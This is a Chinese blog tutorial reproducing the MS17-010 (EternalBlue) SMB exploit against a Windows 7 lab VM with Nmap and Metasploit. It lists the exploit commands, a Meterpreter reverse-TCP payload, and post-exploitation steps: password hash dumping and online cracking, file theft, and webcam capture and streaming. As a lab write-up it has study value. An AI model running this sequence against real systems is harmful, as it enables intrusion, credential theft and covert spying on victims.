MS17-010(永恒之蓝)漏洞复现

358 阅读4分钟

漏洞原理: ● ms17_010 是一种操作系统漏洞,仅影响 Windows 系统中的 SMBv1 服务。这个漏洞是由于 SMBv1 内核函数中的缓冲区溢出而导致的。攻击者可以通过该漏洞控制目标系统,并执行任意代码。这个漏洞通过 445 文件共享端口进行利用,一旦攻击者成功利用该漏洞,就可以在目标主机上植入各种恶意软件,如勒索软件。最近出现的 WannaCry 勒索软件就使用 ms17_010 漏洞来传播和植入勒索代码,将目标系统中的所有文件加密并威胁用户付款。由于该漏洞易受攻击,且已经公开和广泛利用,因此建议 Windows 系统用户及时进行安全更新以避免被攻击。对于其渗透测试相关应用,可以使用 Metasploit 和其他渗透测试框架进行利用和测试。

环境

攻击机:Kali-Linux-2021 虚拟机IP:192.168.1.47

靶机:Windows7 虚拟机IP: 192.168.1.46

工具

Nmap:扫描工具

Metasploit:渗透框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数千个已知软件漏洞的专业级漏洞攻击工具。

开始复现:

首先打开kali的终端,切换至管理员权限

1.输入sudo su
2.Kali密码:kali

image.png

使用Nmap工具进行扫描

1.nmap -T4 -A -v -Pn 192.168.1.46

image.png

可以发现对方的tcp445端口是开放的,然后可以尝试进行ms17-010进行漏洞攻击

通过命令启动metasploit

启用msf,命令为: msfconsole

image.png

上图是启动成功的的页面,可以使用里面的命令和模块了

搜索ms17-010的模块漏洞

命令为: search ms17-010 这里使用序号为3的auxiliary辅助模块,exploit为攻击模块

image.png

use auxiliary/scanner/smb/smb_ms17_010

1.use 3

image.png

上面出现一个问题,第一次为什么会报错,借用老师的话讲,就是空格是为了遵循语法格式,便于扫描

然后查看该模块需要的参数

1.show options

image.png

Required里面yes选项是一定要填的,必须确定一个攻击对象,可以看到缺少的是RHOSTS

设置攻击目标 RHOSTS参数是探测主机ip范围

1.set rhosts 192.168.1.46

image.png

1.show options 再查看一下配置参数

image.png

可以扫描模块了

  1. Run

image.png

可以发现主机是存在Ms17-010漏洞的

使用攻击模块

  1. use 0

image.png

已经转成了攻击模块下面了

查看下参数信息

1.show opthions

image.png

设置攻击负载(默认代码),set payload windows/x64/meterpreter/reverse_tcp

设置受害者ip(win7),set rhosts 192.168.1.46

设置攻击者ip(kali), set lhost 192.168.1.47

image.png

检查没有问题就可以进行攻击了

  1. run/exploit两个都是攻击指令,可以选择一个即可

image.png

这里我们看到,已经成功突破了,接下来让我们通过meterpreter看看可以做什么

首先“截屏”

1.screenshot

image.png

可以看到攻击对象的桌面已经被我摄取到了

image.png

下面让我们上传文件到对象的主机里面试试

1.upload /home/kali/Desktop/qIKKRXwj.jpeg C://

image.png

可以看到我们已经成功了,这里我是上传到了c盘里面,记住输写命令一定要“//”正反无所谓,但一定要输入双斜杠

image.png

让我们在主机里面建个123文档,内容随便输入点什么都可以,然后保存即可

image.png

返回kali下载文档,

  1. download c://123.txt /home/kali/Desktop

image.png

可以看到文档是已经在我们的桌面上的,说明我们已经成功了

image.png

让我们输入getuid查看权限

1.getuid

image.png

可以看到是SYSTEM权限,进入shell目录

image.png

看到很多的乱码是不是,不要慌,,跟着我输入命令

1.Chcp 65001

image.png

可以看到乱码已经消灭了,转到了主机win7目录下面,查看下它的ip

1.Ipconfig

image.png

各位看官老爷看以看到,我们是获得了主机ip的,

接下来,让我们进行下后渗透的利用,

让我们先退出主机,回到meterpreter

1.exit

image.png

让我们查看下账号和密码,

1.hashdump

image.png

首先复制粘贴,然后浏览器输入cmd5.com打开破解器

image.png

你就会发现,对方的账号密码在你面前已经无从遁形了

首先打开你的物理机,请动动小手连接你的摄影机

image.png

让我们截个图看看

1.webcam_snap

image.png

让我们打开一下摄像头,看看有什么

1.webcam_stream

image.png

以上就是ms17-010的操作。 ———————————————— 版权声明:本文为CSDN博主「星ネコ」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。 原文链接:blog.csdn.net/2302_793484…